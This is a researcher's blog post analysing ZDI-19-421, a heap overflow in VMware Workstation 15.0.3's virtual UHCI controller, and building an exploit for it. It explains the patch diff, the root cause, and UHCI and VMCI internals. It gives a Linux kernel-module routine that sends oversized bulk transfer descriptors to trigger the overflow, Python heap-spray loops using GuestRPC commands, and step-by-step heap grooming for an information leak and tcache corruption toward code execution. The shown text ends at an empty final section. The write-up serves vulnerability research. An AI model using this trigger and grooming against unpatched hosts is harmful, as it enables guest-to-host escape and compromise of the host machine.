<h1 id="pwning-vmware-part-2-zdi-19-421-a-uhci-bug">Pwning VMware, Part 2: ZDI-19-421, a UHCI bug</h1>
<p><em>2020-02-29</em></p>
<p>Though we’re now almost to March, I’m still spending my free time working through VMware pwning as part of my <a href="https://adventar.org/calendars/4440">2019 advent calendar</a>. I’d given myself 3 VMware challenges to look at: one CTF challenge from Real World CTF Finals in 2018, and two n-days originally reported at Pwn2Own by Fluoroacetate. My previous post covered the RWCTF challenge, so now it’s time to play around with something more… real world :)</p>
<p>In this post I’ll look at ZDI-19-421, which was utilized for a VM breakout as part of a larger chain by the Fluoroacetate duo at Pwn2Own Vancouver 2019. To do this I’m working solely off the <a href="https://www.vmware.com/security/advisories/VMSA-2019-0005.html">VMware security advisory</a> and avoiding any other writeups or blog posts, to develop my own understanding. This post will cover some VMware internals I learned while working on my exploit, some UHCI internals, and a walkthrough of the techniques that ultimately worked for me. I’m still a USB and VMware noob, but hopefully this post can help shed some light on the workings of a USB exploit.</p>
<p>As a quick note, I used <code class="highlighter-rouge">Ubuntu 18.04</code> for both the host and guest. It doesn’t make a significant difference in the guest, but individual heap exploit details differ pretty significantly based on your choice of host. Luckily for us though, the bug in question is powerful enough that I’d consider it exploitable in the face of almost any allocator.</p>
<h2 id="the-environment">The environment</h2>
<p>Based on the security advisory (above), I determined that Workstation 15.0.4 was the first version with the patch, so I grabbed the free trials for both 15.0.4 and 15.0.3 to bindiff. The exploit itself was developed on 15.0.3, the latest version containing the bug. These installer bundles are still freely available on VMware’s website to play with yourself.</p>
<p>For most of the development I attached gdb to the <code class="highlighter-rouge">vmware-vmx</code> process in order to analyze the heap layout and churn. Most of the actual development was done directly on the guest VM over ssh, and involved frequent restarts of the guest. My final exploit involved a combination of kernel and userspace code in order to avoid reinventing the wheel on some VMware protocols.</p>
<p>According to the advisory and my own experience, the UHCI controller is automatically added in Workstation if you add USB 2.0 or 3.0 to your VM. Therefore, my guest VM was set up with mostly default options for <code class="highlighter-rouge">Ubuntu 18.04</code>, but I assigned it more RAM (16GB) just to make it run a little faster. This isn’t required for my exploit, but merely made my life a little easier.</p>
<h2 id="vsockets-and-the-virtual-machine-communication-interface-vmci">vSockets and the Virtual Machine Communication Interface (VMCI)</h2>
<p>While VMware’s “Backdoor” interface is pretty well described online, an interesting newer development is VMware’s move to the “vsocket” interface for guest-to-host communications. I couldn’t find significant documentation online about how the vsocket surface is implemented, but VMware contributed a linux kernel module for guest support. vSockets matter to us because they have characteristics that affect the heap groom, which I’ll describe in a later section.</p>
<p>To quickly summarize - the “Backdoor” API involves simple interactions with port-mapped IO to send commands:</p>
<pre><code class="language-x86">mov eax, 0x564D5868 // Magic value
mov ebx, <my-parameter>
mov ecx, <my-command>
mov edx, 0x5658 // IO port
in eax, dx
</code></pre>
<p>Backdoor requests are processed as a 7-stage protocol (open, send length, send data, receive length, receive data, finalize, close). Each stage involves a write to the IO port, which can be accessed either directly from userspace or from the kernel. Data can only be sent 4 bytes at a time, and each stage of the request involves a vmexit and a stop-the-world of the guest CPU while the corresponding <code class="highlighter-rouge">vmx-vcpu-*</code> thread processes the request.</p>
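<p>To make the 4-bytes-per-stage constraint concrete, here is a small Python sketch (illustrative only; the real transfer happens via <code class="highlighter-rouge">in</code>/<code class="highlighter-rouge">out</code> instructions in the guest, not Python) that splits an RPC payload into the dwords the send-data stage would transmit, one vmexit per dword. It also shows that the magic value is just “VMXh” in ASCII:</p>

```python
import struct

# The Backdoor magic constant spells "VMXh" when read as big-endian ASCII.
MAGIC = 0x564D5868
assert MAGIC == int.from_bytes(b"VMXh", "big")

def backdoor_chunks(data: bytes):
    """Split an RPC payload into the 4-byte dwords that the Backdoor
    send-data stage would transmit, one vmexit per dword."""
    padded = data.ljust((len(data) + 3) & ~3, b"\x00")
    return [struct.unpack_from("<I", padded, off)[0]
            for off in range(0, len(padded), 4)]

# A 22-byte payload pads to 24 bytes: 6 vmexits just for the data stage.
chunks = backdoor_chunks(b"info-set guestinfo.k v")
```

<p>Six vmexits for a 22-byte payload, on top of the open/length/finalize stages, makes it clear why a shared-memory transport is attractive.</p>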
<p>To address some of these problems, vSockets provide a new interface to access the same API surface (GuestRPC, Shared Folders, Drag-n-Drop, etc). vSockets work by creating an initial connection through port-mapped IO to register guest memory pages for subsequent use as memory-mapped queues. These queues will be used for a socket-style API, which provide for asynchronous communications between the host and guest. The guest system communicates by either writing datagrams to the IO ports in a single <code class="highlighter-rouge">REP INSB</code> instruction, or by writing out packets to the memory-mapped pages for transport-style, stateful connections.</p>
<p>vSockets are used to implement the Virtual Machine Communication Interface (VMCI), a guest-to-host communications mechanism. To communicate, each endpoint gets assigned a CID, which is conceptually similar to an IP address, and then the endpoints can transmit to each other via a simple packet protocol. In a past life, VMCI was intended to allow guests on the same host system to communicate with each other. This allowed for guest-to-guest communication without networking configured, even between nested guests. Nowadays this seems partially deprecated, but it may still be accessible for compatibility. For more implementation details, check out the <a href="https://code.woboq.org/linux/linux/drivers/misc/vmw_vmci/">driver implementation</a> in the mainline kernel.</p>
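<p>For a sense of what a VMCI datagram looks like on the wire, here’s a sketch of the header as I read it from the mainline <code class="highlighter-rouge">vmw_vmci</code> driver linked above: two (context, resource) handle pairs for the destination and source endpoints, followed by a 64-bit payload size. The CID/RID values below are made up for illustration:</p>

```python
import struct

def vmci_datagram(dst_cid, dst_rid, src_cid, src_rid, payload: bytes):
    """Build a VMCI datagram: a 24-byte header (dst handle, src handle,
    u64 payload size) followed by the payload. Layout per my reading of
    the mainline vmw_vmci driver, not an official ABI document."""
    hdr = struct.pack("<IIIIQ", dst_cid, dst_rid, src_cid, src_rid,
                      len(payload))
    return hdr + payload

# Hypothetical endpoints: the CIDs/RIDs here are placeholders.
pkt = vmci_datagram(dst_cid=2, dst_rid=1, src_cid=3, src_rid=0,
                    payload=b"hello")
```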
<h2 id="understanding-uhci">Understanding UHCI</h2>
<p>In order to exploit the bug we have to understand how to trigger the code, and in order to trigger the code we’ll need at least a rudimentary understanding of how UHCI works. The <a href="ftp://ftp.netbsd.org/pub/NetBSD/misc/blymn/uhci11d.pdf">UHCI spec (PDF)</a> is actually pretty readable at just under 50 pages, most of which is tables to refer to. I won’t try to cover it all here, but it’s worth touching on some general concepts. Also, I’m by no means a USB expert - everything here is based on my own understanding as used in my exploit.</p>
<p>UHCI is Intel’s spec for USB 1.1 and was originally documented in the late 90s. It’s primarily a software-driven standard, meaning that the hardware is relatively dumb and relies on the software to set up data structures and drive their manipulation. UHCI devices consist of several parts, but the two we care about are the Host Controller (HC) and the Host Controller Driver (HCD). The HCD represents the software side in the kernel, and the HC is the entrypoint to the hardware, or in our case the host VMX.</p>
<p>Broadly, there are 4 types of USB transfers according to the UHCI spec:</p>
<ul>
<li><strong>Isochronous</strong> transfers are useful for data that needs a relatively constant transfer rate and is also time sensitive. The most obvious example would be audio or video streams.</li>
<li><strong>Interrupt</strong> transfers are for small transfers that occur infrequently, like input devices, but which are time sensitive.</li>
<li><strong>Control</strong> is used for higher-level protocol traffic, like configuration or status.</li>
<li><strong>Bulk</strong> is used for large data streams where we’re less latency sensitive, like transferring files to a flash drive.</li>
</ul>
<p>These distinctions are not actually enforced in UHCI; there’s no reason why you’d be forced to queue packets in a way that respects the latency/ordering or retransmission recommendations. However, it’s still a useful framing for understanding things.</p>
<p>At a broad level, UHCI operates off a large array structure called the <em>Frame List</em>, which is a 1024-long list of pointers. Each pointer references either a <em>Transfer Descriptor</em> (TD) or a <em>Queue Head</em> (QH).</p>
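<p>Each Frame List entry (and each Link Pointer) uses its low bits as flags, per the spec: bit 0 terminates the chain, bit 1 selects whether the target is a QH or a TD, and the target address itself must be 16-byte aligned. A quick Python sketch of that encoding:</p>

```python
def link_ptr(addr, is_qh=False, terminate=False):
    """Encode a UHCI frame list / link pointer: bit0 = Terminate,
    bit1 = QH/TD select (1 = QH), upper bits = the 16-byte-aligned
    physical address of the target descriptor."""
    assert addr & 0xF == 0, "TDs/QHs must be 16-byte aligned"
    return addr | (0x2 if is_qh else 0) | (0x1 if terminate else 0)
```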
<p><img src="https://i.imgur.com/8EeSsoZ.png" alt="Transfer Descriptor" /></p>
<p><strong>Transfer Descriptors</strong> can best be understood as UDP packets. Each TD contains a Packet ID field to specify whether it is being sent or received, addressing information to tell the HC which device it should be sent to, and a Buffer Pointer to either data to be sent or to be written to.</p>
<p>TDs contain two length fields - a <em>MaxLen</em> representing the size of the TD buffer, and an <em>ActLen</em> which the hardware will update to reflect how many bytes were actually sent. An ‘active’ bit is used to determine whether a TD should be copied or skipped; the bit is cleared after data has been read or written. Each TD also contains a <em>Link Pointer</em> (LP) which specifies the next TD or QH.</p>
<p><img src="https://i.imgur.com/5R7ioNP.png" alt="Queue Head" /></p>
<p><strong>Queue Heads</strong> don’t directly point to data but rather act as junction nodes, used primarily by the software to organize itself. Each one contains two Link Pointers. When processing a QH, the HC will first follow the element LP, and then take the head LP branch afterwards. QHs can, in turn, point to other QHs as well, allowing for pretty complex schedules to be followed. QHs could be used to organize traffic to prioritize certain USB endpoints or transfer types, or simply to allow the software to quickly add or remove large parts of the list.</p>
<p><img src="https://i.imgur.com/GCHCDuO.png" alt="Example UHCI schedule" /></p>
<p>When enabled, the HC will iterate through the Frame List, pulling the next frame pointer every 1 ms. It follows the chain of TDs/QHs in that frame and processes them one at a time, marking each one complete. When the 1 ms window runs out of time, it simply stops processing TDs and jumps to the next Frame List pointer.</p>
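<p>The traversal described above can be modeled in a few lines of Python. This is a toy model built on my own simplified node representation, and it ignores the depth/breadth bits and the 1 ms budget, but it captures the element-then-head ordering:</p>

```python
def walk(node, out):
    """Toy walk of a UHCI schedule: QHs are junction nodes whose
    element branch is taken first and head branch afterwards; TDs are
    processed only if their active bit is set, then deactivated."""
    while node is not None:
        if node["type"] == "td":
            if node["active"]:
                out.append(node["name"])
                node["active"] = False
            node = node["link"]
        else:  # queue head: descend into element chain, then continue
            walk(node["element"], out)
            node = node["head"]
    return out

# Example frame entry: QH { element: td1 -> td2, head: td3 }
td2 = {"type": "td", "name": "td2", "active": True, "link": None}
td1 = {"type": "td", "name": "td1", "active": True, "link": td2}
td3 = {"type": "td", "name": "td3", "active": True, "link": None}
qh  = {"type": "qh", "element": td1, "head": td3}
order = walk(qh, [])
```

<p>Because QHs act as junctions, the software can detach or reorder an entire queue of TDs by rewriting a single link pointer.</p>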
<p>Technically, the software is responsible for queueing things so they fit into the time window. Linux’s <code class="highlighter-rouge">uhci_hcd</code> driver handles this by pointing each frame list entry at the same dummy entry, then queueing TDs onto it as necessary. The one exception is isochronous TDs, which can be queued directly onto their expected 1 ms window.</p>
<h2 id="bindiff-and-chill">Bindiff and Chill</h2>
<p>Using Bindiff between 15.0.3 and 15.0.4, I noticed only a few functions that match with high confidence and have control flow graph related changes.</p>
<p><img src="https://i.imgur.com/LTr50zf.png" alt="vmx bindiff" /></p>
<p>5 functions are marked with <code class="highlighter-rouge">G</code> in their “Change” columns, two of which match with >= 90% similarity. One of them looks as follows:</p>
<p><img src="https://i.imgur.com/vRblhxf.png" alt="uhci_parse_td_list bindiff" /></p>
<p>It looks like a new check has been added against the contents of some data, with a fast bailout as seen in the basic block on the right. In the decompiler, we can get some more information on what’s happening:</p>
<pre><code class="language-c">// Grab the TD off the queued list
v58 = *((unsigned int *)v55 - 32);
v64 = *(_QWORD *)(*(_QWORD *)(*(v55 - 5) + 16LL * v57) + 8LL);
v70 = *(_WORD *)(v64 + 10) >> 5;
v71 = (v70 + 1) & 0x7FF;
v61 = (v70 + 1) & 0x7FF;
if ( (unsigned int)v71 > (unsigned int)v58 )
{
sub_55A410("UHCI: bulk TD size %d exceeds max packet size %d\n", v71, v58, v63, v117);
if ( !v65 )
goto LABEL_178;
LABEL_210:
sub_60CC50(v65);
goto LABEL_178;
}
</code></pre>
<p>Based on this error message, it seems like the check ensures that the current TD’s size doesn’t run over the total calculated size for the bulk TD stream.</p>
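<p>Re-expressed in Python: the word at offset +10 of the TD, shifted right by 5 (as in the decompile above), is the top 11 bits of the 32-bit token, i.e. the MaxLen field, which encodes length-minus-one. A sketch of that decode and the newly added bound check, under my reading of the diff:</p>

```python
def td_len(token):
    """Actual transfer length encoded in a TD token: MaxLen is the top
    11 bits and stores length-minus-one (0x7FF encodes a 0-byte packet).
    Equivalent to the decompile's ((word at +10) >> 5 + 1) & 0x7FF."""
    maxlen = (token >> 21) & 0x7FF
    return (maxlen + 1) & 0x7FF

def patched_check(token, max_packet_size):
    """The 15.0.4 fix: bail out if this TD claims more bytes than the
    device's max packet size."""
    return td_len(token) <= max_packet_size

evil_token = (0x100 - 1) << 21  # a TD claiming 0x100 bytes
```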
<p>The buggy code in 15.0.3 finally sheds some light on the nature of the bug. Below is some pseudocode annotated based on my own reversing:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">urb_size</span> <span class="o">=</span> <span class="n">usbdev</span><span class="o">-></span><span class="n">maxpkt</span> <span class="o">*</span> <span class="n">num_tds</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">urb_size</span> <span class="o">></span> <span class="n">max_urb_size</span><span class="p">)</span>
<span class="n">urb_size</span> <span class="o">=</span> <span class="n">max_urb_size</span>
<span class="n">urb</span> <span class="o">=</span> <span class="n">Vusb_NewUrb</span><span class="p">(</span><span class="n">uhcidev</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">urb_size</span><span class="p">);</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">usbdev</span><span class="o">-></span><span class="n">tds</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="n">td</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">uhci_copyin</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span><span class="s">"TDBuf"</span><span class="p">,</span><span class="n">td</span><span class="o">-></span><span class="n">addr</span><span class="p">,</span> <span class="n">urb</span><span class="o">-></span><span class="n">buf</span><span class="p">,</span> <span class="n">td</span><span class="p">))</span> <span class="p">{</span>
<span class="n">Vusb_FreeUrb</span><span class="p">(</span><span class="n">urb</span><span class="p">);</span>
<span class="k">goto</span> <span class="n">ERROR_ADDR</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">td</span><span class="o">-></span><span class="n">next</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The UHCI virtual device calculates the total size of the TD buffer to copy in as <code class="highlighter-rouge">max_device_packet_length * num_tds</code>, but it never validates that each individual TD’s claimed length actually fits within the device’s max packet size, so the total stream can exceed the allocation. Per the UHCI spec, each TD can contain up to 0x3ff bytes, but most VMware devices expect TD packet sizes like 0x20 or 0x30 bytes.</p>
<p>For example, UHCI allows for up to 0x80 TDs in a single bulk transfer, and VMware’s Virtual Bluetooth device has a max TD size of 0x30. This means the host will allocate a heap buffer of size 0x1800 but if we set each TD to contain 0x100 bytes we can write up to 0x8000 fully controlled bytes to the host heap, a significant overflow.</p>
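<p>The arithmetic for that Bluetooth-device case, spelled out:</p>

```python
NUM_TDS = 0x80    # max TDs in a single bulk transfer
MAX_PKT = 0x30    # virtual Bluetooth device's max packet size
CLAIMED = 0x100   # length we actually place in each TD

alloc_size   = NUM_TDS * MAX_PKT    # what the host allocates
bytes_copied = NUM_TDS * CLAIMED    # what the buggy copy loop writes
overflow     = bytes_copied - alloc_size
```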
<h2 id="triggering-the-bug">Triggering the bug</h2>
<p>To trigger the bug we’ll have to write a kernel module to send a UHCI bulk stream. Thanks to helper functions we can access from the existing UHCI driver, this is pretty simple. The relevant code is as follows, mostly adapted from existing code in that same driver:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__hc32</span> <span class="nf">uhci_setup_leak</span><span class="p">(</span><span class="k">struct</span> <span class="n">uhci_hcd</span> <span class="o">*</span> <span class="n">uhci</span><span class="p">,</span> <span class="k">struct</span> <span class="n">uhci_qh</span> <span class="o">*</span> <span class="n">qh</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">uhci_td</span> <span class="o">*</span> <span class="n">td</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">status</span><span class="p">;</span>
<span class="n">__hc32</span> <span class="o">*</span> <span class="n">plink</span><span class="p">;</span>
<span class="n">__hc32</span> <span class="n">retval</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">toggle</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">added_tds</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="c1">// Allocate from our dma pool, which returns buffers of size 0x8000</span>
<span class="n">dma_addr_t</span> <span class="n">dma_handle</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">u8</span> <span class="o">*</span> <span class="n">dma_vaddr</span> <span class="o">=</span> <span class="n">dma_pool_alloc</span><span class="p">(</span><span class="n">mypool</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">,</span> <span class="o">&</span><span class="n">dma_handle</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">dma_vaddr</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x8000</span><span class="p">);</span>
<span class="cm">/* 3 errors, dummy TD remains inactive */</span>
<span class="cp">#define uhci_maxerr(err)((err) << TD_CTRL_C_ERR_SHIFT)
</span> <span class="n">status</span> <span class="o">=</span> <span class="n">uhci_maxerr</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="o">|</span> <span class="n">TD_CTRL_ACTIVE</span><span class="p">;</span>
<span class="n">plink</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span><span class="p">;</span>
<span class="c1">// Send 0x80 TDs</span>
<span class="k">for</span> <span class="p">(</span><span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="mh">0x80</span><span class="p">;</span> <span class="n">x</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">plink</span><span class="p">)</span> <span class="p">{</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">uhci_alloc_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">);</span>
<span class="o">*</span> <span class="n">plink</span> <span class="o">=</span> <span class="n">LINK_TO_TD</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Each TD contains 0x100 bytes</span>
<span class="n">uhci_fill_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">,</span> <span class="n">status</span><span class="p">,</span>
<span class="n">uhci_myendpoint</span><span class="p">(</span><span class="mh">0x2</span><span class="p">)</span> <span class="o">|</span> <span class="n">USB_PID_OUT</span> <span class="o">|</span>
<span class="c1">// this endpoint corresponds to the VMware Virtual Bluetooth device</span>
<span class="n">DEVICEADDR</span> <span class="o">|</span> <span class="n">uhci_explen</span><span class="p">(</span><span class="mh">0x100</span><span class="p">)</span> <span class="o">|</span>
<span class="p">(</span><span class="n">toggle</span> <span class="o"><<</span> <span class="n">TD_TOKEN_TOGGLE_SHIFT</span><span class="p">),</span>
<span class="n">dma_handle</span><span class="p">);</span>
<span class="n">plink</span> <span class="o">=</span> <span class="o">&</span> <span class="n">td</span><span class="o">-></span><span class="n">link</span><span class="p">;</span>
<span class="n">status</span> <span class="o">|=</span> <span class="n">TD_CTRL_ACTIVE</span><span class="p">;</span>
<span class="n">dma_handle</span> <span class="o">+=</span> <span class="mh">0x100</span><span class="p">;</span>
<span class="n">dma_vaddr</span> <span class="o">+=</span> <span class="mh">0x100</span><span class="p">;</span>
<span class="n">added_tds</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Restore the dummy TD as the last in the chain</span>
<span class="n">td</span> <span class="o">=</span> <span class="n">uhci_alloc_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">);</span>
<span class="o">*</span><span class="n">plink</span> <span class="o">=</span> <span class="n">LINK_TO_TD</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">);</span>
<span class="c1">// The last packet has 0 length</span>
<span class="n">uhci_fill_td</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">td</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">USB_PID_OUT</span> <span class="o">|</span> <span class="n">uhci_explen</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">wmb</span><span class="p">();</span>
<span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span><span class="o">-></span><span class="n">status</span> <span class="o">|=</span> <span class="n">cpu_to_hc32</span><span class="p">(</span><span class="n">uhci</span><span class="p">,</span> <span class="n">TD_CTRL_ACTIVE</span><span class="p">);</span>
<span class="c1">// Return the dma handle which we can write to the frame list</span>
<span class="n">retval</span> <span class="o">=</span> <span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span><span class="o">-></span><span class="n">dma_handle</span><span class="p">;</span>
<span class="n">qh</span><span class="o">-></span><span class="n">dummy_td</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Upon sending this payload, the UHCI Host Controller inside the VMX will allocate a buffer of size 0x18c0 and copy 0x8000 bytes from our guest memory into it. We successfully crash the host process with a heap error, and we can confirm in the debugger that we’re smashing significant amounts of heap data.</p>
<h2 id="heap-grooming-primitives">Heap Grooming primitives</h2>
<p>Unlike the previous challenge, which could be pwned solely on a glibc non-main arena, our USB bug can only be triggered on the main heap arena. This is unfortunate for us because the main arena has significant amounts of heap churn in a default VM:</p>
<ul>
<li>Each device associated with the VM will make allocations, sometimes only when used and sometimes just in the background</li>
<li>The VMX process stores data internally in a database called “VMDB”, which makes frequent allocations in the 0x20 -> 0x80 size range</li>
<li>VMautomation, which we don’t even seem to use in our test VM, also makes small allocations at periodic intervals</li>
<li>The “heartbeat” and “time sync” features also make allocations, although we can disable these</li>
</ul>
<p>Actually, it gets even worse because much of the code that interacts with the heap seems overeager to make unnecessary clones of buffers.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>vmtoolsd <span class="nt">--cmd</span> <span class="s1">'info-set guestinfo.mykey this-is-my-value'</span>
gef➤ search-pattern <span class="s2">"this-is-my-value"</span> little heap
<span class="o">[</span>+] Searching <span class="s1">'this-is-my-value'</span> <span class="k">in </span>heap
<span class="o">[</span>+] In <span class="s1">'[heap]'</span><span class="o">(</span>0x5593bdfda000-0x5593be6d7000<span class="o">)</span>, <span class="nv">permission</span><span class="o">=</span>rw-
0x5593be44a390 - 0x5593be44a3a0 → <span class="s2">"this-is-my-value"</span>
0x5593be49e680 - 0x5593be49e690 → <span class="s2">"this-is-my-value"</span>
0x5593be4b5380 - 0x5593be4b5390 → <span class="s2">"this-is-my-value"</span>
0x5593be6a51b0 - 0x5593be6a51c0 → <span class="s2">"this-is-my-value"</span>
</code></pre></div></div>
<p>During this simple <code class="highlighter-rouge">info-set</code> operation, I counted <strong>19 total allocations</strong> of buffers for our data. Most of them are immediately freed, usually the result of code patterns like <code class="highlighter-rouge">x = strdup(value); / do_something(x); / free(x)</code>, with the bulk of these occurring in the “VmdbVmCfg” data structure functions.</p>
<p>To work around this, I utilized the GuestRPC command <code class="highlighter-rouge">vmx.capability.unified_loop [value]</code>, which takes a single argument and traverses a global linked list looking to see if the user has previously stored that value. If not, it will save the value onto the list permanently. The command has no limits on how much data we can spray into the host heap, so we can use it with different value sizes as a straightforward way to level out the initial heap state.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mh">0x50</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s">"vmtoolsd --cmd 'vmx.capability.unified_loop aaaaaaaaaaaa</span><span class="si">%04</span><span class="s">x</span><span class="si">%</span><span class="s">s' > /dev/null"</span> <span class="o">%</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="s">"B"</span><span class="o">*</span><span class="mh">0x3c0</span><span class="p">))</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mh">0x100</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s">"vmtoolsd --cmd 'vmx.capability.unified_loop bbbbbbbbbbbb</span><span class="si">%04</span><span class="s">x</span><span class="si">%</span><span class="s">s' > /dev/null"</span> <span class="o">%</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="s">"B"</span><span class="o">*</span><span class="mh">0x100</span><span class="p">))</span>
</code></pre></div></div>
<p>One additional factor that helps us is utilizing our knowledge of glibc’s <a href="https://github.com/lunaczp/glibc-2.27/blob/951caf57765b28d91319dc44fd16e84182e1fde1/malloc/malloc.c#L1145">thread arena</a> architecture. In a multithreaded application, glibc may create different “arenas” for each thread, where each arena has its own associated freelist structures. Each thread arena has a separate heap mapping, although chunks can be freed to arenas corresponding to different heap regions. In our case, VMware has a separate thread arena for each <code class="highlighter-rouge">vmx-vcpu-*</code> thread and uses the main arena for the <code class="highlighter-rouge">vmware-vmx</code> thread.</p>
<p>To work around these arenas, we can utilize both the “Backdoor” and VMCI interfaces in the exploit. VMCI works in an asynchronous fashion, where incoming requests are serviced on the main <code class="highlighter-rouge">vmware-vmx</code> thread. This means that VMCI-related allocations are made on the heap’s main arena, as opposed to Backdoor-related allocations, which are made on the <code class="highlighter-rouge">vmx-vcpu-*</code> thread arenas. We can use this control to improve our sprays by being precise about which method we use to send commands.</p>
<h2 id="obtaining-a-leak">Obtaining a leak</h2>
<p>To obtain a leak, we’ll abuse the different thread arenas to improve our chances of allocating chunks in the order we want. In order to leak data, I chose to target GuestRPC allocations that allocate data from the user and allow us to query it back. For this purpose, I played with the following commands:</p>
<ul>
<li><code class="highlighter-rouge">info-set guestinfo.[key] [value]</code> allows us to spray arbitrary ASCII key-value pairs into the host heap. These are not stored with associated length fields but instead are merely NULL terminated, so clobbering the strings lets us retrieve data beyond the “value” buffer. Furthermore, the corresponding <code class="highlighter-rouge">info-get</code> command retrieves a value and caches it temporarily, allowing us to <code class="highlighter-rouge">free()</code> the buffer later, at will</li>
<li><code class="highlighter-rouge">guest.upgrader_send_cmd_line_args [value]</code> allows us to store a single ASCII value, up to 0x400 bytes. We can then query the value at will. However, since it merely stores the raw pointer in the vmx binary BSS, this only causes minimal heap churn.</li>
</ul>
<p>To setup the leak, I performed several steps of grooming to improve the reliability:</p>
<ol>
<li>Stop userspace processes that trigger large allocations, like X11 (SVGA) and VMware tools processes</li>
<li>Disable all unrelated hardware devices (networking, CD-ROM, soundcards, etc)</li>
<li>Spray 0x200 chunks of size 0x50 with <code class="highlighter-rouge">info-set</code>, which we can later free, onto the vmx heap</li>
<li>Spray 0x60 chunks of size 0x800 with <code class="highlighter-rouge">unified_loop</code> to level out the initial vmx heap state</li>
<li>Spray 2 <code class="highlighter-rouge">info-set</code> buffers onto the <code class="highlighter-rouge">vmx-vcpu-0</code> heap of size 0x1c80 and 0x1890</li>
<li>Re-spray all the 0x50-sized values onto the <code class="highlighter-rouge">vmx-vcpu-0</code> heap, which has the side effect of freeing all the buffers on the main heap. These chunks will be used for miscellaneous bookkeeping allocations by the binary, preventing them from interfering with subsequent steps</li>
<li>Copy the first buffer via <code class="highlighter-rouge">info-get</code>, then copy the second; due to the nature of glibc unsorted-bin freelists, the second will land directly on top of the first, leaving a chunk of size 0x1c80-0x1890 = 0x3F0 on that freelist</li>
<li>Invoke <code class="highlighter-rouge">guest.upgrader_send_cmd_line_args</code> with a buffer to fill that 0x3F0 chunk we just created</li>
<li>Free the <code class="highlighter-rouge">info-get</code> buffer and trigger the USB bug. We’ll clobber the 0x3F0 ASCII string into the subsequent chunk. The subsequent chunk will most likely be a vtable pointer, allocated as part of the <code class="highlighter-rouge">unified_loop</code> spray above</li>
</ol>
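<p>A quick sanity check on the size relationship that makes step 7 work, using the sizes from the steps above:</p>

```python
BIG, SMALL = 0x1C80, 0x1890   # the two info-set buffers from step 5
hole = BIG - SMALL            # remainder left on the unsorted bin
# Note: 0x3f0 is still within glibc's default tcache range (chunk
# sizes up to 0x410), which is what the tcache corruption described
# in the next section relies on.
```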
<p><img src="https://i.imgur.com/YaqBFHm.gif" alt="Heap grooming for a leak" /></p>
<h2 id="corrupting-a-channel">Corrupting a channel</h2>
<p>Once we’ve obtained a leak, the path to obtaining PC control is relatively straightforward through the use of <a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/tcache/">tcache freelists</a> in glibc. This process is largely identical to what is presented above for the leak. However, this time we won’t allocate <code class="highlighter-rouge">guest.upgrader_send_cmd_line_args</code> at all, but rather just clobber the tcache pointer in the freed 0x3f0 space.</p>
<p>With arbitrary chunk creation, I chose to obtain PC as in my previous post. Since the steps are identical, you can find more information <a href="https://nafod.net/blog/2019/12/21/station-escape-vmware-pwn.html">there (see “Overwriting a channel..”)</a>.</p>
<h2 id="putting-it-all-together">Putting it all together</h2>
